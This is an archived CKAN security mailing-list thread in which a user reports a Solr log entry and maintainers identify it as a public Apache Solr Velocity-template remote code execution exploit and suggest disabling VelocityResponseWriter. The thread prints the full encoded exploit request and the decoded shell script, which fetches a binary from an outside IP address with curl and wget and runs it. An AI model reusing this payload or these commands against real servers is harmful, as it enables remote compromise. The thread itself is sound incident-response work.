[CKAN-Security] Vulnerability in the WIld

Adrià Mercader adria.mercader at okfn.org
Thu Nov 7 10:49:13 UTC 2019


@Tyler Kennedy <tk at tkte.ch>
I'm not sure the OP gets your messages if you don't include them in the
response
Good to know it's not harmful




On Wed, 6 Nov 2019 at 20:00, Tyler Kennedy <tk at tkte.ch> wrote:

> This is what it tries to run (duplicate lines are not a mistake, this is a
> script kiddie trying to piece something together so it is messy):
>
> ```
> /usr/bin/curl -o /root/rter http://194.249.0.167/sites/default/files/sync
> chmod +x /root/rter
> chmod 777 /root/rter
> /root/rter
> /root/rter 2>&1
> /usr/bin/curl -o /tmp/erta http://194.249.0.167/sites/default/files/sync
> chmod +x /tmp/erta
> chmod 777 /tmp/erta
> /tmp/erta
> /tmp/erta
> /usr/bin/wget  -O /home/so*/fert
> http://194.249.0.167/sites/default/files/sync
> chmod 777 /home/so*/fert
> /home/so*/fert
> /home/so*/fert
> /usr/bin/curl -o /var/tmp/etfet
> http://194.249.0.167/sites/default/files/sync
> chmod 777 /var/tmp/etfet
> /var/tmp/etfet
> /usr/bin/wgetak -O /var/tmp/rtsfv
> http://194.249.0.167/sites/default/files/sync
> chmod 777 /var/tmp/rtsfv
> /var/tmp/rtsfv
> /var/tmp/rtsfv
> /usr/bin/curl -o /dev/shm/reuer
> http://194.249.0.167/sites/default/files/sync
> chmod 777 /dev/shm/reuer
> /dev/shm/reuer
> /usr/bin/wget -O /dev/shm/reuer
> http://194.249.0.167/sites/default/files/sync
> chmod 777 /dev/shm/reuer
> ```
>
> On Wed, Nov 6, 2019 at 1:51 PM Tyler Kennedy <tk at tkte.ch> wrote:
>
>> Hello.
>>
>> This is not a CKAN exploit, but an exploit in Solr allowing remote code
>> execution. It is copied from
>> https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
>> Are you sure this actually affected you? You will see garbage in the logs
>> that did nothing all the time as bots try to find exploits. Make sure
>> VelocityResponseWriter is disabled (should be by default) and this exploit
>> will do nothing.
>>
>> Thank you,
>> Tyler Kennedy
>>
>> On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:
>>
>>> Ckan 2.8.x
>>> Solr 6.6.x
>>> Solr Logs:
>>>  webapp=/solr path=/select
>>> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
>>> hits=0 status=0 QTime=0
>>>
>>> any version unaffected?
>>> how could we fix it?
>>>
>>> --
>>> You received this message because you are subscribed to the Google
>>> Groups "CKAN Security" group.
>>> To unsubscribe from this group and stop receiving emails from it, send
>>> an email to security+unsubscribe at ckan.org.
>>> _______________________________________________
>>> CKAN security
>>> https://lists.okfn.org/mailman/listinfo/security
>>> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>>>
>>> Repo: https://github.com/ckan/ckan-security
>>
>> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>
> Repo: https://github.com/ckan/ckan-security
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20191107/b51d17d4/attachment-0001.html>


More information about the Security mailing list